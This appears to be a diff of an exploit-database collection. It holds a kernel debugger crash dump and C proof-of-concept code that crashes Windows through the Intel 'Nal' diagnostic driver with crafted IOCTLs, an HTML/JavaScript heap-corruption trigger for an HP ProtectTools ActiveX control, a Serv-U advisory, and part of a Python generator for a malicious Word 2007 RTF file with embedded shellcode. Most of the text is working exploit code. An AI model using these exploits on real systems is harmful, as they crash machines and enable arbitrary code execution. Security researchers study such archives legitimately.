r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
iqvw64e+0x11ac:
fffff880`05a091ac 8bd8 mov ebx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff800039e80f7 rsp=fffff8800653b8d0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!IopXxxControlFile+0x607:
fffff800`039e80f7 448be0 mov r12d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800039e8956 rsp=fffff8800653ba00 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!NtDeviceIoControlFile+0x56:
fffff800`039e8956 4883c468 add rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800036cb113 rsp=fffff8800653ba70 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiSystemServiceCopyEnd+0x13:
fffff800`036cb113 65ff042538220000 inc dword ptr gs:[2238h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02e09 rsp=000000000021e898 rbp=00000000001dfe68
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64cpu!CpupSyscallStub+0x9:
00000000`73b02e09 c3 ret
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02944 rsp=000000000021e8a0 rbp=00000000001dfe68
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64cpu!DeviceIoctlFileFault+0x31:
00000000`73b02944 488b4c2420 mov rcx,qword ptr [rsp+20h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7d286 rsp=000000000021e960 rbp=000000000021e9d0
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64!RunCpuSimulation+0xa:
00000000`73b7d286 eb00 jmp wow64!RunCpuSimulation+0xc (00000000`73b7d288)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7c69e rsp=000000000021e9b0 rbp=000000000021e9d0
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64!Wow64LdrpInitialize+0x42a:
00000000`73b7c69e cc int 3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=00000000774e2670 rdi=00000000774b5978
rip=00000000773f4966 rsp=000000000021ef00 rbp=00000000773b0000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=00000000774e2520 r13=0000000000000000
r14=00000000774e2650 r15=000000007efdf000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll!LdrpInitializeProcess+0x17e3:
00000000`773f4966 eb00 jmp ntdll!LdrpInitializeProcess+0x1c12 (00000000`773f4968)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
rax=0000f88005a696d1 rbx=000000007efdf000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000007efdb000 rdi=0000000000000000
rip=00000000773f1937 rsp=000000000021f3f0 rbp=0000000000000000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021f4b0 r13=00000000773b0000
r14=0000000000000001 r15=000000007740a220
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll! ?? ::FNODOBFM::`string'+0x28ff0:
00000000`773f1937 89442430 mov dword ptr [rsp+30h],eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
rax=0000f88005a696d1 rbx=000000000021f4b0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000000
rip=00000000773dc34e rsp=000000000021f460 rbp=0000000000000000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll!LdrInitializeThunk+0xe:
00000000`773dc34e b201 mov dl,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
3: kd> dd fffff8800653b8d0
fffff880`0653b8d0 80862013 00000000 0653bb60 fffff880
fffff880`0653b8e0 4d1084d0 fffffa80 4d01e160 fffffa80
fffff880`0653b8f0 746c6644 00000000 0653b928 fffff880
fffff880`0653b900 0653b968 fffff880 00000000 00000000
fffff880`0653b910 00000000 00000000 00000001 00000000
fffff880`0653b920 4c804e01 00000000 4d1084d0 fffffa80
fffff880`0653b930 00000000 00000000 00000000 00000000
fffff880`0653b940 4d01e160 fffffa80 76bdd0af 00000000
3: kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS fffffa8048f5f740
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 00187000 ObjectTable: fffff8a0000017f0 HandleCount: 535.
Image: System
.
.
.
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
.
.
.
3: kd> !handle fffffa804d0f29e0 7
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
Handle table at fffff8a016893450 with 13 entries in use
Invalid Handle: 0x4d0f29e0
3: kd> !process fffffa804d0f29e0 f
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
VadRoot fffffa804a9eb220 Vads 30 Clone 0 Private 110. Modified 0. Locked 0.
DeviceMap fffff8a0022b5570
Token fffff8a01685d060
ElapsedTime 00:00:39.608
UserTime 00:00:00.000
KernelTime 00:00:00.000
QuotaPoolUsage[PagedPool] 20128
QuotaPoolUsage[NonPagedPool] 3360
Working Set Sizes (now,min,max) (510, 50, 345) (2040KB, 200KB, 1380KB)
PeakWorkingSetSize 510
VirtualSize 11 Mb
PeakVirtualSize 11 Mb
PageFaultCount 529
MemoryPriority BACKGROUND
BasePriority 8
CommitCharge 140
Job fffffa804d0fc080
THREAD fffffa804c800060 Cid 0d9c.0da0 Teb: 000000007efdb000 Win32Thread: 0000000000000000 RUNNING on processor 3
IRP List:
fffffa804d01e160: (0006,0118) Flags: 00060000 Mdl: 00000000
Not impersonating
DeviceMap fffff8a0022b5570
Owning Process fffffa804d0f29e0 Image: ConsoleApplication7.exe
Attached Process N/A Image: N/A
Wait Start TickCount 440956 Ticks: 0
Context Switch Count 31 IdealProcessor: 3
UserTime 00:00:00.000
KernelTime 00:00:00.000
*** WARNING: Unable to verify checksum for ConsoleApplication7.exe
*** ERROR: Module load completed but symbols could not be loaded for ConsoleApplication7.exe
Win32 Start Address ConsoleApplication7 (0x0000000000041354)
Stack Init fffff8800653bc70 Current fffff8800653b530
Base fffff8800653c000 Limit fffff88006536000 Call 0
Priority 11 BasePriority 8 UnusualBoost 0 ForegroundBoost 2 IoPriority 2 PagePriority 5
Child-SP RetAddr Call Site
fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a (TrapFrame @ fffff880`0653b210)
fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`0653bae0)
00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
3: kd> !irp fffffa804d01e160
Irp is active with 1 stacks 1 is current (= 0xfffffa804d01e230)
No Mdl: No System Buffer: Thread fffffa804c800060: Irp stack trace.
cmd flg cl Device File Completion-Context
>[ e, 0] 5 0 fffffa804aac7b00 fffffa804d1084d0 00000000-00000000
\FileSystem\iqvw64e
Args: 00000000 00000000 80862013 deadbeef
3: kd> !object fffffa804aac7b00
Object: fffffa804aac7b00 Type: (fffffa804900af30) Device
ObjectHeader: fffffa804aac7ad0 (new version)
HandleCount: 0 PointerCount: 2
Directory Object: fffff8a000010060 Name: Nal
3: kd> dt_IO_STACK_LOCATION 0xfffffa804d01e230
ntdll!_IO_STACK_LOCATION
+0x000 MajorFunction : 0xe ''
+0x001 MinorFunction : 0 ''
+0x002 Flags : 0x5 ''
+0x003 Control : 0 ''
+0x008 Parameters : <unnamed-tag>
+0x028 DeviceObject : 0xfffffa80`4aac7b00 _DEVICE_OBJECT
+0x030 FileObject : 0xfffffa80`4d1084d0 _FILE_OBJECT
+0x038 CompletionRoutine : (null)
+0x040 Context : (null)
3: kd> !devobj 0xfffffa80`4aac7b00 7
Device object (fffffa804aac7b00) is for:
Nal \FileSystem\iqvw64e DriverObject fffffa804b0f4d70
Current Irp 00000000 RefCount 1 Type 00008086 Flags 00000044
Dacl fffff9a10008c391 DevExt fffffa804aac7c50 DevObjExt fffffa804aac7c68
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)
Device queue is not busy.
3: kd> !drvobj fffffa804b0f4d70 7
Driver object (fffffa804b0f4d70) is for:
\FileSystem\iqvw64e
Driver Extension List: (id , addr)
Device Object list:
fffffa804aac7b00
DriverEntry: fffff88005fda200 iqvw64e
DriverStartIo: 00000000
DriverUnload: fffff88005a09010 iqvw64e
AddDevice: 00000000
Dispatch routines:
[00] IRP_MJ_CREATE fffff88005a09090 iqvw64e+0x1090
[01] IRP_MJ_CREATE_NAMED_PIPE fffff800036b0e30 nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE fffff88005a090f0 iqvw64e+0x10f0
[03] IRP_MJ_READ fffff800036b0e30 nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE fffff800036b0e30 nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA fffff800036b0e30 nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA fffff800036b0e30 nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS fffff800036b0e30 nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL fffff88005a09150 iqvw64e+0x1150
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[10] IRP_MJ_SHUTDOWN fffff800036b0e30 nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP fffff800036b0e30 nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT fffff800036b0e30 nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER fffff800036b0e30 nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE fffff800036b0e30 nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP fffff800036b0e30 nt!IopInvalidDeviceRequest
*/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
int main(int argc, char **argv)
{
HANDLE hDevice;
DWORD bret;
char szDevice[] = "\\\\.\\Nal";
printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n");
printf("Opening handle to driver..\n");
// CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDispoition, dwFlagsAndAttributes, hTemplateFile)
if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
printf("Device %s succesfully opened!\n", szDevice);
printf("\tHandle: %p\n", hDevice);
}
else
{
printf("Error: Error opening device %s\n", szDevice);
}
printf("\nPress any key to DoS..");
_getch();
bret = 0;
// Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007
// DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped)
if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
{
printf("DeviceIoControl Error - bytes returned %#x\n", bret);
}
CloseHandle(hDevice);
return 0;
}

22
platforms/windows/dos/36403.html Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/50895/info
HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
HP Device Access Manager for HP ProtectTools versions prior to 6.1.0.1 are vulnerable.
<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>

9
platforms/windows/dos/36405.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50906/info
Serv-U is prone to a denial-of-service vulnerability and a security-bypass vulnerability.
Attackers can exploit these issues to perform denial-of-service attacks or gain unauthorized access to the affected application.
Serv-U 11.1.0.3 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36405.zip

45
platforms/windows/local/36104.py Executable file
View file

File diff suppressed because one or more lines are too long

141
platforms/windows/local/36207.py Executable file
View file

@ -0,0 +1,141 @@
# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015
# Author : R-73eN
# Software : Microsoft Office Word 2007
# Tested : Windows 7 Starter
import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
